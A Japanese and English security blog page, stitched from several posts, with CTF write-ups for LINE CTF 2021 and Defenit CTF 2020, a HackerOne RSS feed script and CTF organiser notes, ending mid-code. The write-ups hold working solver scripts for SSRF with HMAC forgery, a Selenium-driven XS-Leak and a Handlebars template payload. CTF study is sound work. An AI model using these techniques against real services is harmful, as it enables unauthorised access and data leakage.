
|Function|Description|Notes|
|-|-|-|
|`valid_download(src)`|srcが指定されているかを検証する||
|`WriteFile(url)`|引数`url`に対するGETリクエストのレスポンスを、あるファイルに書き込む。|あるファイル: f`backup/${url.split('/')[-1]}`|
|`LanguageNomarize(request)`|リクエストのヘッダ`Lang`の値を正規化する|正規化した後、f`${request.host_url}{language}`にGETリクエストを飛ばす。そのリクエストに対するレスポンスのコードが200だった場合、レスポンスの文字列がreturnされる。|
|`list_routes()`|重要でないため省略||
|`SignCheck(request)`|リクエストのクエリ文字列に対するHMAC検証を行う|`GET /rollback`と`GET or POST /rollback`内で利用されている。|

### Utilities in `app.rollback`

|Function|Description|Notes|
|-|-|-|
|`RunRollbackDB(dbhash)`|DBのロールバックを実行する|`backup/`以下に、引数`dbhash`から記号を取り除いた名前のファイルがあれば、(なぜか)FLAGの内容を読み出して返してくれる。|
|`RunbackupDB(remove, dbhash)`|省略||

### Endpoints

|Endpoint|Description|Notes|
|-|-|-|
|`GET /index`|トップページ||
|`GET /en`|省略||
|`GET /jp`|省略||
|`GET /coin`|コインの価格情報を返すAPI|レスポンスのヘッダー`Lang`には`app.main.LanguageNomarize(request)`の結果がセットされる|
|`GET /download`|パラメータ`src`で指定されたURLをダウンロードする|ダウンロードには`app.main.download(src)`を利用する|
|`POST /download`|`GET /download`と同様||
|`GET /addsub`|新規Subscriber登録用API||
|`GET /integrityStatus`|DBの完全性に関するステータス取得用API|DBファイルのパスと、現在のDBの整合性検証用ハッシュ(`dbHash`)の値が取得できる。|
|`GET /rollback`|DBのロールバック用API|`app.main.SignCheck(request)`をpassすると、`app.main.Activity.IntegrityCheck`が実行される。引数`key`には、リクエストヘッダ`Key`の値が渡され、引数`dbHash`にはクエリ文字列で指定した`dbhash`の値が渡される。|

### Solver

```py
import hashlib
import hmac
import json
from urllib.parse import urljoin

import requests

PUBLIC_BASE_URL = 'http://35.190.234.195/'
PRIVATE_HOST = 'localhost:5000'

PRIVATE_KEY = b"let'sbitcorinparty"


def get_db_hash() -> str:
    res = requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                       headers={
                           'Host': PRIVATE_HOST,
                           'Lang': 'integrityStatus'
                       })
    return json.loads(res.headers['lang'])['dbhash']


def generate_sign(s: str) -> str:
    return hmac.new(PRIVATE_KEY, s.encode(), hashlib.sha512).hexdigest()


def generate_key(s: str) -> str:
    return hashlib.sha512(s.encode('ascii')).hexdigest()


def add_prefix(s: str, prefix: str) -> str:
    return f'{prefix}{s}'


def execute_download(srcUrl: str) -> requests.Response:
    sign = generate_sign(f'src={srcUrl}')
    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'download?src={srcUrl}',
                            'Sign': sign
                        })


def execute_rollback(dbHash: str) -> requests.Response:
    FRAGMENT = '_'

    key = generate_key(dbHash)
    sign = generate_sign(f'dbhash={add_prefix(dbHash, FRAGMENT)}')

    return requests.get(urljoin(PUBLIC_BASE_URL, '/'),
                        headers={
                            'Host': PRIVATE_HOST,
                            'Lang': f'rollback?dbhash={add_prefix(dbHash, FRAGMENT)}',
                            'Key': key,
                            'Sign': sign
                        })


def exploit():
    execute_download(f'https://lab.8ay.ac/{get_db_hash()}')
    res = execute_rollback(get_db_hash())

    print(f'flag: {res.headers["lang"]}')


if __name__ == "__main__":
    exploit()
```

### Flag

`LINECTF{YOUNGCHAYOUNGCHABITCOINADAMYMONEYISBURNING}`

## [Web 50pts] Your Note (22/680 Solves)

### 問題文

```txt
Secure private note service
※ Admin have disabled some security feature of their browser...

Flag Format: LINECTF{[a-z0-9-]+}

添付ファイル: your-note.zip
```

### Writeup

`GET /search`のソースコードの下記部分に注目した。

```py
@app.route('/search')
@login_required
def search():
    q = request.args.get('q')
    download = request.args.get('download') is not None
    if q:
        notes = Note.query.filter_by(owner=current_user).filter(or_(Note.title.like(f'%{q}%'), Note.content.like(f'%{q}%'))).all()
        if notes and download:
            return Response(json.dumps(NoteSchema(many=True).dump(notes)), headers={'Content-disposition': 'attachment;filename=result.json'})
    else:
        return redirect(url_for('index'))
    return render_template('index.html', notes=notes, is_search=True)
```

8~9行目を見ると、下記の条件がすべて整っているとき、レスポンスヘッダに`Content-disposition: attachment`が入ってくることがわかる。

- 検索機能で得られたNoteの件数が1件以上である
- request.args.get('download')がNoneでない

要するに、検索機能において、クエリ文字列として`?download=`を与えた上で検索機能を実行した結果が、下記のように分かれる。

|検索機能で得られたNoteの件数|レスポンスに`Content-disposition: attachment`が付くか|
|:-:|:-:|
|1件以上|✅|
|1件よりも少ない|✖|

この性質をオラクルとしたXS Leaksが想定解法と予想した。
実際に、管理者に`{{BASE_URL}}/search?q=%&download`[^6]というURLをレポートしたところ、通常とは違う`ng`というメッセージが出たため、この予想は正しかった。

### Solver

下記のSolverを使って、flag文字列を頭から一文字ずつ抽出した。[^7]

```py
import os
import string
import subprocess
from concurrent.futures.thread import ThreadPoolExecutor
from urllib.parse import quote, urljoin

from selenium import webdriver
from selenium.webdriver.chrome.options import Options

BASE_URL = os.getenv('BASE_URL')

USERNAME = os.getenv('USERNAME')
PASSWORD = os.getenv('PASSWORD')

S = string.ascii_lowercase + string.digits + '-'

FLAG_PRE = 'LINECTF{'
FLAG_SUF = '}'


def length_is(n: int) -> str:
    return f'{FLAG_PRE}{"_" * n}{FLAG_SUF}'


def nth_char_is(n: int, c: str) -> str:
    return f'{FLAG_PRE}{"_" * (n - 1)}{c}%{FLAG_SUF}'


def prop_holds(prop: str):
    print(f"\r[info] Attempting this prop => '{prop}'\033[0K", end='')

    options = Options()
    options.add_argument('--headless')
    driver = webdriver.Chrome(os.getenv('CHROME_DRIVER_PATH'), options=options)
    try:
        # Login
        driver.get(urljoin(BASE_URL, '/login'))
        driver.find_element_by_css_selector('input[name=username]').send_keys(USERNAME)
        driver.find_element_by_css_selector('input[name=password]').send_keys(PASSWORD)
        driver.find_element_by_css_selector('button[type=submit]').submit()

        # Move to /report
        report_bug_button = driver.find_element_by_css_selector('a.button.is-warning.is-light')
        report_bug_button.click()

        # Proof of work
        pow_cmd = driver.find_element_by_tag_name('strong').get_attribute('textContent').split('&&')[-1].strip()
        proof = subprocess.check_output(pow_cmd, shell=True).decode()

        # Make the payload
	    payload = urljoin(BASE_URL, f'/search?q={prop}&download=')

        # Submit the payload
        driver.find_element_by_css_selector('input[name=url]').send_keys(payload)
        driver.find_element_by_css_selector('input[name=proof]').send_keys(proof)
        driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(4) > p > button').submit()

        # Check the result
        flash_message_el = driver.find_element_by_css_selector(
            '#content > div > div > div.box > form > div:nth-child(6)')
        truth = flash_message_el.get_attribute('textContent').strip() == 'ng'

        return prop, truth

    except Exception as e:
        return prop, False

    finally:
        driver.close()


def backup(revealed_flag: str):
    with open('flag.bak', mode='w') as f:
        f.write(revealed_flag)


if __name__ == "__main__":
    with ThreadPoolExecutor(max_workers=8) as executor:
        upper_bound = 50
        props = [length_is(i) for i in range(1, upper_bound + 1)]
        secret_length = [v[0].count('_') for i, v in enumerate(list(executor.map(prop_holds, props))) if v[1]].pop()

    print(f'\r[+] secret_length: {secret_length}\033[0K')

    secret = ''
    for i in range(1, secret_length + 1):
        with ThreadPoolExecutor(max_workers=4) as executor:
            props = [nth_char_is(i, c) for c in S]
            possible_chars = [v for v in executor.map(prop_holds, props) if v[1]]
            if len(possible_chars) == 1:
                secret += possible_chars.pop()[0].lstrip(f'{FLAG_PRE}{"_" * (i - 1)}').rstrip(f'%{FLAG_SUF}')
            else:
                secret += '?'

            print(f'\r[+] ~N={i} => {secret}\033[0K')
            backup(f'{FLAG_PRE}{secret}')

    print(f'[*] flag: {FLAG_PRE}{secret}{FLAG_SUF}')
```

### Flag

`LINECTF{1-kn0w-what-y0u-d0wn10ad}`

## 注釈

[^1]: こちらは、チームメイトの[@y0d3n](https://twitter.com/y0d3n)氏と解きました。
[^2]: ひとまず簡単なWriteup出しておいて、復習するタイミングで詳細な解説を付けるやり方は、割とありな気がしている。
[^3]: FYI: <https://qiita.com/no1zy_sec/items/dfccd91cf76bf73b7754>
[^4]: GETリクエストがあればflagを入手するには十分だったため、他のメソッドのリクエストが発行できるかは調査しなかった。
[^5]: フォワードされた後、`app.main.LanguageNomarize(request)`を用いて、正規化される場合がある。
[^6]: `%`は0文字以上の文字列を表すワイルドカード
[^7]: 実際には、チームメイトの[@y0d3n](https://twitter.com/y0d3n)氏による手動リークの方が速かったが、プライバシーの観点から、彼の顔写真の代わりにPythonによるSolverスクリプトを掲載した。


こんにちは、8ayacです🐝
本記事は、LINE CTF 2021で解いた2問のWriteupです。
解いた問題は、diveinternalとYour Note^1です。

感謝と謝罪とWriteupは鮮度が大事らしいので、内容は丁寧な解説とかはなく、簡易的なものになっています。^2
基本的には、問題の内容を知っている人向けの説明になっており、コンテキストが大きく省略されている部分がありますので、ご注意ください。

The English version is here

\[Web 50pts] diveinternal (65/680 Solves)

問題文



Writeup

配…

HackerOneのユーザプロフィールのRSSフィードを生成するスクリプトを書いた

**🎄本記事は [IPFactory Advent Calendar 2020 - Qiita](https://qiita.com/advent-calendar/2020/ipfactory) 21日目の記事です🎄**



こんにちは、[8ayac](https://twitter.coem/8ayac)です。
今回は、最近書いたHackerOneのユーザプロフィールのRSSフィードを生成するスクリプトを紹介する記事です。

## 概要

HackerOneのユーザのプロフィール上にあるHacktivityのRSSフィードを生成するスクリプトをPythonで書きました。
ちなみに、筆者のHackerOneのユーザのプロフィールは[こちら](https://hackerone.com/8ayac)です。

## 背景

今回、RSSフィードを生成するスクリプトを自分で書くことになった経緯を説明します。

### [IPFacotry.github.io](https://ipfactory.github.io)について

IPFactoryでは、下図のようにメンバーのアウトプットを一覧表示する[ページ](https://ipfactory.github.io)を公開しています。
このページ自体は、[Team Blog Hub](https://github.com/catnose99/team-blog-hub)に自分たちで手を加えたものです。

![メンバーのアウトプットを一覧表示するページ](img/writing-a-script-to-generate-the-RSS-feed-of-user-profile-in-H1/ipfactory.github.io_toppage.png)

各メンバーのアウトプット(基本的にはブログ)の更新情報は、毎日自動的に取得され、ページに反映されます。
各アウトプットについて、RSSフィードを配信しているURLを設定ファイルに適切に記述しておけば、それを元に更新情報が自動で取得されます。
更新情報の自動取得とページへの反映には、GitHub Actionsを利用しています。

### HackerOneのプロフィールページ

HackerOneのユーザのプロフィールページでは、下図のように、ユーザの脆弱性報告の履歴がHacktivityとして一覧で表示されています。

![筆者のHacktivity](img/writing-a-script-to-generate-the-RSS-feed-of-user-profile-in-H1/h1_profile.png)

### 公式ではHacktivityのRSSフィードが配信されていない

筆者はバグバウンティが好きなので、[IPFactory.github.io](https://ipfactory.github.io/)に、自身のブログと同様に、Hacktivityの情報も掲載しています。
実際には、下図の赤枠で囲われた部分のような感じで掲載されています。

![BlogHubに筆者のHacktivityの情報が掲載されている様子](img/writing-a-script-to-generate-the-RSS-feed-of-user-profile-in-H1/ipfactory.github.io_8ayac.png)

このように、Hacktivityの情報を掲載するには、HacktivityのRSSフィードが必要です。
しかしながら、どうやら、公式ではHacktivityのRSSフィードが用意されていませんでした。
このようにRSSフィードが公式に配信されていないページのRSSを取得する際、普段であれば、[Feed43](https://feed43.com/)というサービスを利用しています。
しかし、HackerOneのユーザプロフィールページは、JavaScriptを用いて動的にページを生成していたため、Feed43ではうまくRSSフィードを作成できませんでした。
このような事情で、自身でRSSフィードを生成するスクリプトを書くことになりました。

## 実際のスクリプト

実際のスクリプトは、下記の通りです。
[feedgen](https://pypi.org/project/feedgen/)という便利なライブラリを使っています。

```python
#!/usr/bin/env python3.9
import json
from argparse import Namespace
from datetime import datetime, timedelta, timezone

import requests
from feedgen.entry import FeedEntry
from feedgen.feed import FeedGenerator

USERNAME = '8ayac'
H1_USER_PROFILE = f'https://hackerone.com/{USERNAME}'


def utc_to_jst(utc_time: str) -> datetime:
    utc_time = datetime.fromisoformat(utc_time.replace('Z', '+00:00'))
    return utc_time.astimezone(timezone(timedelta(hours=9)))


def fetch_user_hacktivity_items(username: str) -> 'json_data':
    api_url = 'https://hackerone.com/graphql'
    gql = '{"operationName":"BetterUserProfileHacktivityQuery","variables":{"where":{"reporter":{"username":{"_eq":"' + USERNAME + '"}}},"orderBy":{"field":"popular","direction":"DESC"},"secureOrderBy":null,"count":25,"maxShownVoters":10},"query":"query BetterUserProfileHacktivityQuery($orderBy: HacktivityItemOrderInput, $secureOrderBy: FiltersHacktivityItemFilterOrder, $where: FiltersHacktivityItemFilterInput, $count: Int, $cursor: String, $maxShownVoters: Int) {\n  hacktivity_items(first: $count, after: $cursor, order_by: $orderBy, secure_order_by: $secureOrderBy, where: $where) {\n    ...HacktivityList\n    __typename\n  }\n  me {\n    id\n    __typename\n  }\n}\n\nfragment HacktivityList on HacktivityItemConnection {\n  total_count\n  pageInfo {\n    endCursor\n    hasNextPage\n    __typename\n  }\n  edges {\n    node {\n      ... on HacktivityItemInterface {\n        id\n        databaseId: _id\n        ...HacktivityItem\n        __typename\n      }\n      __typename\n    }\n    __typename\n  }\n  __typename\n}\n\nfragment HacktivityItem on HacktivityItemUnion {\n  type: __typename\n  ... on HacktivityItemInterface {\n    id\n    votes {\n      total_count\n      __typename\n    }\n    voters: votes(last: $maxShownVoters) {\n      edges {\n        node {\n          id\n          user {\n            id\n            username\n            __typename\n          }\n          __typename\n        }\n        __typename\n      }\n      __typename\n    }\n    upvoted: upvoted_by_current_user\n    __typename\n  }\n  ... on Undisclosed {\n    id\n    ...HacktivityItemUndisclosed\n    __typename\n  }\n  ... on Disclosed {\n    id\n    ...HacktivityItemDisclosed\n    __typename\n  }\n  ... on HackerPublished {\n    id\n    ...HacktivityItemHackerPublished\n    __typename\n  }\n}\n\nfragment HacktivityItemUndisclosed on Undisclosed {\n  id\n  reporter {\n    id\n    username\n    ...UserLinkWithMiniProfile\n    __typename\n  }\n  team {\n    handle\n    name\n    medium_profile_picture: profile_picture(size: medium)\n    url\n    id\n    ...TeamLinkWithMiniProfile\n    __typename\n  }\n  latest_disclosable_action\n  latest_disclosable_activity_at\n  requires_view_privilege\n  total_awarded_amount\n  currency\n  __typename\n}\n\nfragment TeamLinkWithMiniProfile on Team {\n  id\n  handle\n  name\n  __typename\n}\n\nfragment UserLinkWithMiniProfile on User {\n  id\n  username\n  __typename\n}\n\nfragment HacktivityItemDisclosed on Disclosed {\n  id\n  reporter {\n    id\n    username\n    ...UserLinkWithMiniProfile\n    __typename\n  }\n  team {\n    handle\n    name\n    medium_profile_picture: profile_picture(size: medium)\n    url\n    id\n    ...TeamLinkWithMiniProfile\n    __typename\n  }\n  report {\n    id\n    title\n    substate\n    url\n    __typename\n  }\n  latest_disclosable_action\n  latest_disclosable_activity_at\n  total_awarded_amount\n  severity_rating\n  currency\n  __typename\n}\n\nfragment HacktivityItemHackerPublished on HackerPublished {\n  id\n  reporter {\n    id\n    username\n    ...UserLinkWithMiniProfile\n    __typename\n  }\n  team {\n    id\n    handle\n    name\n    medium_profile_picture: profile_picture(size: medium)\n    url\n    ...TeamLinkWithMiniProfile\n    __typename\n  }\n  report {\n    id\n    url\n    title\n    substate\n    __typename\n  }\n  latest_disclosable_activity_at\n  severity_rating\n  __typename\n}\n"}'

    res = requests.post(api_url, headers={'Content-Type': 'application/json'}, data=gql.replace('\n', '\\n'))
    return json.loads(res.text, object_hook=lambda d: Namespace(**d)).data.hacktivity_items.edges


def set_report_info(feed: FeedEntry, *,
                    report_id: int, published_at: datetime, reported_to: str, awarded_amount: int, currency: str,
                    url: str = H1_USER_PROFILE, report_title: str = f'{"▇" * 7}', content: str = None):
    feed_title = f'#{report_id} [{reported_to}] {report_title} ' \
                 f'- Bounty: {awarded_amount:,}({currency})'

    feed.id(str(report_id))
    feed.title(feed_title)
    feed.link(href=url)
    feed.published(published_at)

    lnk_html = f'<a href="{url}">{url}</a>'
    feed.content(f'{lnk_html}<br />{content}' if content else lnk_html)


if __name__ == '__main__':
    feed_generator = FeedGenerator()
    feed_generator.id(H1_USER_PROFILE)
    feed_generator.link(href=H1_USER_PROFILE)
    feed_generator.title('HackerOne')
    feed_generator.description(f'{USERNAME}\'s bug reports on HackerOne')

    user_hacktivity_items = fetch_user_hacktivity_items(USERNAME)
    for edge in user_hacktivity_items:
        report = edge.node

        database_id = int(report.databaseId)
        team = report.team.name
        reporter = report.reporter.username
        bounty = int(report.total_awarded_amount or '0')
        currency_str = report.currency

        feed = feed_generator.add_entry()
        if not report.type == 'Disclosed':
            set_report_info(feed,
                            report_id=database_id,
                            published_at=utc_to_jst(report.latest_disclosable_activity_at),
                            reported_to=team,
                            awarded_amount=bounty,
                            currency=currency_str)
        else:
            report_url = report.report.url
            set_report_info(feed,
                            report_id=database_id,
                            published_at=utc_to_jst(report.latest_disclosable_activity_at),
                            reported_to=team,
                            awarded_amount=bounty,
                            currency=currency_str,
                            url=report_url,
                            report_title=report.report.title,
                            content=requests.get(f'{report_url}.json').json()['vulnerability_information_html'])

    feed_generator.rss_file('h1_hacktivity_items_rss.xml')
```

### 使い方

1. コード内の`USERNAME`の値を、取得したいユーザのユーザ名にする。
2. 下記コマンドを実行する。

```shell-session
$ python3 --version 
Python 3.9.0

$ pip install feedgen
(snip)

$ python3 <スクリプトのパス>
```

うまく実行できていると、スクリプトがあるディレクトリ内に`h1_hacktivity_items_rss.xml`というファイル名のRSSフィードが生成されます。

## 余談(的な何か)

### フィード配信の自動化について

配信するフィードは、定期的かつ自動的に更新されることが理想的ですが、現在はそのようにはなっていません。
具体的には、ローカルで手動生成したフィードを自身のGitHub Page用のリポジトリに上げて、そのフィードがGitHub Pageで配信されている状態です。

最近、バグバウンティ活動をあまり頻繁に行っていないことも原因で、自動化の必要性も強く感じていませんでしたが、本記事を書いている際に「このスクリプトを少し改良すれば、お気に入りのバグハンターのHacktivityの更新情報をRSSリーダーで購読できるな」と気づいたので、近いうちにフィードの生成から配信までのフローは自動化します。

### 没ネタについて

実は、今回のアドカレでは、CTFの作問に使えそうな小ネタについて書く予定でした。

しかしながら、実際に書き始めたところ、「～というのがあり、～というケースでは、～というリスクが生じる。リアルワールドで使えるかはわからないが、CTFの問題を作るとしたら、こんな感じの問題が作れそう。完」という感じのツイートレベルのものにしかならなさそうだったため、ボツにしました。

個人的なメモをそのまま公開してしまおうかな、とも考えましたが、せっかくならちゃんとCTFの問題として出したいな、という気持ちになり、今回のネタに変更した次第です。

### 🎍

それでは、皆様、良いお年をお迎えください。

:page_facing_up: Migrate articles from Hatena Blog.

:recycle: Modify the image's source path.

Revert commits to enable image optimization.

🎄本記事は IPFactory Advent Calendar 2020 - Qiita 21日目の記事です🎄



こんにちは、8ayacです。
今回は、最近書いたHackerOneのユーザプロフィールのRSSフィードを生成するスクリプトを紹介する記事です。

概要

HackerOneのユーザのプロフィール上にあるHacktivityのRSSフィードを生成するスクリプトをPythonで書きました。
ちなみに、筆者のHackerOneのユーザのプロフィールはこちらです。

背景

今回、RSSフィードを生成するスクリプトを自分で書くことになった経緯を説明します。

IPFacotry.g…

ISCCTF 2020 開催記

:recycle: Unify uppercase letters in metadata id to lowercase letters.

こんにちは、8ayacです🐝

本記事では、2020/10/24(土)に開催したISCCTF 2020について、反省を交えて色々書きました。
筆者は、問題サーバのデプロイ以外をほぼ全てを担当していたため、書くことが多く、少し長めの記事になりましたが、興味のあるところだけでも読んでもらえると嬉しいです。

ちなみに、ISCCTF 2020自体は、(SurveyやTwitterのリアクションを見ている限りでは、)想像以上に好評でした。
競技開始前も競技中も、色々な心配を抱えながら運営をしていたので、安堵しています。

「ISCCTF 2020」の概要

ISCCTF 2020の概要は以下の通りで…

ISCCTF 2020 作問者Writeup(Greetinjs/mark damn it) と所感

こんにちは、8ayacです🐝

今回は、2020/10/24(土)に開催した入門者向けCTF「ISCCTF 2020」で、私が作問した問題のWriteupを紹介しつつ、軽く所感とか振り返りを(軽く)書きました。

## [Web 100pts - 88.09% solves[^1]] Greetinjs

作問者Writeupは[こちら](https://github.com/IPFactory/ISCCTF2020/tree/main/web/Greetinjs/solution)

### 振り返り

CTFに馴染みがなくても解けるレベルの問題を目指しました。
もしかしたら、この手の問題は概出かもしれませんが、**入門者向け**CTFのwarmup問となると、被るのも仕方がないかな、と考えていました。

### 所感

あるWebページが読み込んでいるリソースまで注目するのは重要ですよね。

## [Web 475pts - 19.04% solves[^2]] mark damn it

作問者Writeupは[こちら](https://github.com/IPFactory/ISCCTF2020/tree/main/web/mark-damn-it/solution)

### 振り返り

mark damn itは、CVE-2020-14001を使ったRCEをテーマにした問題でした。
この脆弱性は、バージョン2.3.0以前の[Kramdown](https://kramdown.gettalong.org/)にあったRCEです。

筆者は、real-worldの脆弱性が好きなので、何かしらCVEをテーマにした問題を出したいと考えていました。
入門者向けとなると難しいなあ、と思っていたところ、Pwn/Rev/Misc作問担当の[@n01e0](https://twitter.com/n01e0)が、「[これ](https://www.feneshi.co/blog/CVE-2020-14001/)誰か使いませんか」と投げてくれたので、私が問題にした感じです。
Rubyを書いた経験はほとんどなかったので、Rubyの勉強になりました。

### 所感

MarkdownをHTMLに変換してレンダリングする機能には、脆弱性が作り込まれやすいイメージがあります。
ちなみに、筆者がバグバウンティで初めて報告した脆弱性は、そのような機能でのXSS[^3]でした。

## まとめ

これ、実質作問していないのでは...?

CTFの作問は楽しいので、もっとCTFに自分の問題を出してみたいなあ。

## 注釈

[^1]: 参加者のうち1点以上を獲得した84人中74人が正答
[^2]: 参加者のうち1点以上を獲得した84人中16人が正答
[^3]: <https://hackerone.com/reports/384255>


こんにちは、8ayacです🐝

今回は、2020/10/24(土)に開催した入門者向けCTF「ISCCTF 2020」で、私が作問した問題のWriteupを紹介しつつ、軽く所感とか振り返りを(軽く)書きました。

\[Web 100pts - 88.09% solves^1] Greetinjs

作問者Writeupはこちら

振り返り

CTFに馴染みがなくても解けるレベルの問題を目指しました。
もしかしたら、この手の問題は概出かもしれませんが、入門者向けCTFのwarmup問となると、被るのも仕方がないかな、と考えていました。

所感

あるWebページが読み込んでいるリソースまで注目…

ISC BugHunt101 CTF 2020 作問者 Writeup

こんにちは、8ayacです🐝
今回は、"ISC BugHunt101 CTF 2020"で作問した3問のWriteupを書きました。
全部Webです。

ISC BugHunt101 CTF 2020とは

ISC BugHunt101 CTF 2020は、筆者が、筆者の通う学校の生徒向けにプライベートで開催したCTFのことです。
最近、筆者の通う学校の生徒を対象に「バグハント入門」というテーマでオンライン講義を行う機会があり、その一環で開催したという経緯です。
講義自体は、合計400分で、CTFには最後の100分で、各々チームを作って挑戦してもらいました。
なお、参加者のレベル感的には、ほ…

2020 Defenit CTF Writeup ([Web]BabyJS, Fortune Cookie) - [English]

Hi, I'm 8ayac🐝 This post is a writeup of the 2 challenges I solved in [2020 Defenit CTF](https://ctftime.org/event/1060).
The challenges I solved are "Fortune Cookies" and "BabyJS" in Web category.

In addition, the result was a total of 1053pts and was 55th out of 964 teams.

![The result of IPFactory](img/writeup-of-2020-defenit-ctf-english-ver/IPFactory_result.png?w=229&h=43)

日本語版は[こちら](http://caya8.hatenablog.com/entry/2020/06/07/181927)

## [Web 248pts] BabyJS (47/964 Solves)

### Problem

```txt
Description
    Render me If you can.

Server
    babyjs.ctf.defenit.kr

Attachments
    babyjs.tar.gz
```

### Problem app overview

When I extracted the problem file, I found the source code of the application and the Docker configuration file etc.
It was an app written using Express, and template engine is [Handlebars](https://handlebarsjs.com/).

```javascript
const express = require('express');
const path = require('path');
const crypto = require('crypto');
const fs = require('fs');
const app = express();

const SALT = crypto.randomBytes(64).toString('hex');
const FLAG = require('./config').FLAG;

app.set('view engine', 'html');
app.engine('html', require('hbs').__express);

if (!fs.existsSync(path.join('views', 'temp'))) {
    fs.mkdirSync(path.join('views', 'temp'));
}

app.use(express.urlencoded());
app.use((req, res, next) => {
    const { content } = req.body;

    req.userDir = crypto.createHash('md5').update(`${req.connection.remoteAddress}_${SALT}`).digest('hex');
    req.saveDir = path.join('views', 'temp', req.userDir);

    if (!fs.existsSync(req.saveDir)) {
        fs.mkdirSync(req.saveDir);
    }

    if (typeof content === 'string' && content.indexOf('FLAG') != -1 || typeof content === 'string' && content.length > 200) {
        res.end('Request blocked');
        return;
    }

    next();
});

app.get('/', (req, res) => {
    const { p } = req.query;
    if (!p) res.redirect('/?p=index');
    else res.render(p, { FLAG, 'apple': 'mint' });
});

app.post('/', (req, res) => {
    const { body: { content }, userDir, saveDir } = req;
    const filename = crypto.randomBytes(8).toString('hex');

    let p = path.join('temp', userDir, filename)

    fs.writeFile(`${path.join(saveDir, filename)}.html`, content, () => {
        res.redirect(`/?p=${p}`);
    })
});

app.listen(8080, '0.0.0.0');
```

Below is an overview of the features in the app.
See the source code for details.

- `GET /`: Display a page
  - Render the view specified by the GET parameter `p`
- `POST /`: Post some text
  - A file is created on the server whose content is the value of the POST parameter `content`.
    - After posting, if there is no problem (described later), you will be automatically redirected to `/?p={posted file path}`.
  - Create a file on the server whose content is the value of the POST parameter `content`.
  - After posting, if there is no problem (details will be described later), you will be automatically redirected to `/?p={posted file path}`.

### What is the final goal?

A variable `FLAG` is passed to view in the part commented with ★ in the following part.
I thought if I post a view that renders it properly I would get the flag.

```javascript
app.get('/', (req, res) => {
    const { p } = req.query;
    if (!p) res.redirect('/?p=index');
    else res.render(p, { FLAG, 'apple': 'mint' });  // ★
});
```

However, if you simply try to post a view written as `{{FLAG}}`, it will be blocked at the place marked with ① in the middleware like below.
Also, posts longer than 200 characters will be blocked.

```javascript
app.use((req, res, next) => {
    const { content } = req.body;

    req.userDir = crypto.createHash('md5').update(`${req.connection.remoteAddress}_${SALT}`).digest('hex');
    req.saveDir = path.join('views', 'temp', req.userDir);

    if (!fs.existsSync(req.saveDir)) {
        fs.mkdirSync(req.saveDir);
    }

    if (typeof content === 'string' && content.indexOf('FLAG') != -1 || typeof content === 'string' && content.length > 200) {  // ①
        res.end('Request blocked');
        return;
    }

    next();
});
```

It seems to be okay setting the final goal to post a view within 200 characters that does not include the character `FLAG`.

### Solution

Finally, referring to [this document](https://handlebarsjs.com/guide/builtin-helpers.html#each), I created the following payload.

```handlebars
{{#each this}}{{@key}} => {{this.toString}}<br>{{/each}}
```

When I actually posted it, the flag was displayed as follows.

![Got the flag of this problem](img/writeup-of-2020-defenit-ctf-english-ver/babyjs_got_the_flag.png?w=543&h=172)

#### Explanation of the payload

You can see `this` in the payload, and that is an object like below.
I used the Handlebars's Built-in Helper [#each](https://handlebarsjs.com/guide/builtin-helpers.html#each) to render all keys and values.toString() ​​of this object.

```txt
{
    settings: {
        'x-powered-by': true,
        etag: 'weak',
        'etag fn': [Function: generateETag],
        env: 'development',
        'query parser': 'extended',
        'query parser fn': [Function: parseExtendedQueryString],
        'subdomain offset': 2,
        'trust proxy': false,
        'trust proxy fn': [Function: trustNone],
        view: [Function: View],
        views: '/app/views',
        'jsonp callback name': 'callback',
        'view engine': 'html'
    },
    FLAG: 'Defenit{w3bd4v_0v3r_h7tp_n71m_0v3r_Sm8}',
    apple: 'mint',
    _locals: [Object: null prototype] {},
    cache: false
}
```

### Flag

`Defenit{w3bd4v_0v3r_h7tp_n71m_0v3r_Sm8}`

## [Web 507pts] Fortune Cookie (15/964 Solves)

### Problem

```txt
Description
    Here's a test of luck!
    What's your fortune today?

Server
    fortune-cookie.ctf.defenit.kr

Attachments
    fortune-cookie.tar.gz
```

### Problem app overview

When I extracted the problem file, I found the source code of the application and the Docker configuration file etc.
Apparently it's an Express + MongoDB app.

The source code of the application (`data/node/app.py`) is as follows.

```javascript
const express = require('express');
const cookieParser = require('cookie-parser');
const { MongoClient, ObjectID } = require('mongodb');
const { FLAG, MONGO_URL } = require('./config');

const app = express();

app.set('view engine', 'html');
app.engine('html', require('ejs').renderFile);

app.use(cookieParser('🐈' + '🐇'));
app.use(express.urlencoded());


app.get('/', (req, res) => {
    res.render('index', { session: req.signedCookies.user });
});

app.get('/login', (req, res) => {
    res.render('login');
});

app.post('/login', (req, res) => {
    let { username } = req.body;

    res.cookie('user', username, { signed: true });
    res.redirect('/');
});

app.use((req, res, next) => {
    if (!req.signedCookies.user) {
        res.redirect('/login');
    } else {
        next();
    }
});

app.get('/logout', (req, res) => {
    res.clearCookie('user');
    res.redirect('/');
});

app.get('/write', (req, res) => {
    res.render('write');
});

app.post('/write', (req, res) => {

    const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    const author = req.signedCookies.user;

    const { content } = req.body;

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .insertOne({
                author,
                content
            })
            .then((result) => {
                res.redirect(`/view?id=${result.ops[0]._id}`)
            }
            );

        client.close();

    });

});

app.get('/view', (req, res) => {

    const client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    const author = req.signedCookies.user;
    const { id } = req.query;

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        try {
            collection
                .findOne({
                    _id: ObjectID(id)
                })
                .then((result) => {

                    if (result && typeof result.content === 'string' && author === result.author) res.render('view', { content: result.content })
                    else res.end('Invalid or not allowed');

                }
                );
        } catch (e) { res.end('Invalid request') } finally {
            client.close();
        }


    });
});

app.get('/posts', (req, res) => {

    let client = new MongoClient(MONGO_URL, { useNewUrlParser: true });
    let author = req.signedCookies.user;

    if (typeof author === 'string') {
        author = { author };
    }

    client.connect(function (err) {

        if (err) throw err;

        const db = client.db('fortuneCookie');
        const collection = db.collection('posts');

        collection
            .find(author)
            .toArray()
            .then((posts) => {
                res.render('posts', { posts })
            }
            );

        client.close();

    });

});

app.get('/flag', (req, res) => {

    let { favoriteNumber } = req.query;
    favoriteNumber = ~~favoriteNumber;

    if (!favoriteNumber) {
